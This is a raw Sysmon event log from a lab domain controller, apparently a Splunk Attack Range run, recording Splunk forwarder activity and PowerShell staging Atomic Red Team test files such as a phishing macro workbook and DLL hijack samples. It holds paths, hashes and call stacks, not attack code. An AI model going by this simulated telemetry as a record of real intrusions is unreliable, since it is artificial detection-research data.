21:08:53.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.562{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.404{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A45AC7B904CD4A1E6122242246D3FEDC,SHA256=13F50412007A3D6AF1B9CE50699ED796BBCB6C3333F802B484AD00589B559E76,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.841{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1566.001\bin\PhishingAttachment.xlsm2021-06-23 21:08:54.826 11241100x800000000000000024535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.763{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1564\src\T1564-macrocode.txt2021-06-23 21:08:54.763 11241100x800000000000000024534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.654{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1564.004\src\test.ps12021-06-23 21:08:54.654 10341000x800000000000000024533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E6-60D3-2006-00000000CF01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2E6-60D3-2006-00000000CF01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.482{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E6-60D3-2006-00000000CF01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.483{4DB9351A-A2E6-60D3-2006-00000000CF01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.420{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BF6447C75DF238F79B66F9332FAA81,SHA256=39884AF61A0B82F88EB54DB0C1A9B940D0F52593F8C14B46715ACDB28BC41A4C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:54.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1562.004\bin\AtomicTest.exe2021-06-23 21:08:54.341 23542300x800000000000000024523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:54.201{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DB7250A1E3E9C85997D87A2BC3E74A0F,SHA256=73DAB6746EC7ADE4816A25448EAA46F96E83592D15FD9E01CFF72EA66DF04C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.888{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\used_guids.txt2021-06-23 21:08:55.888 10341000x800000000000000024555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.716{4DB9351A-A2E7-60D3-2106-00000000CF01}53006712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000024554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:55.701{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.012\src\x64\Release\atomicNotepad.dll2021-06-23 21:08:55.701 11241100x800000000000000024553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.012\src\atomicNotepad\atomicNotepad.vcxproj2021-06-23 21:08:55.545 10341000x800000000000000024552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E7-60D3-2106-00000000CF01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A2E7-60D3-2106-00000000CF01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.545{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E7-60D3-2106-00000000CF01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.546{4DB9351A-A2E7-60D3-2106-00000000CF01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000024544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.012\src\atomicNotepad.sln2021-06-23 21:08:55.513 11241100x800000000000000024543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:55.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.012\bin\T1574.012x64.dll2021-06-23 21:08:55.482 23542300x800000000000000024542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.482{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ADF16F95C2B029BACD32657D15B8049,SHA256=D982164B7C7DA916BD0580DE67D758B3F511B670044B578EDE50EF52E98F13D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.435{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8A559B0E6CD82F43A41A791418F3C91,SHA256=67CCA9395BEE9AE88F9F07C5B7A60877F3CEE96D1725F73CE872D772BEED8E67,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:55.357{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.009\bin\WindowsServiceExample.exe2021-06-23 21:08:55.357 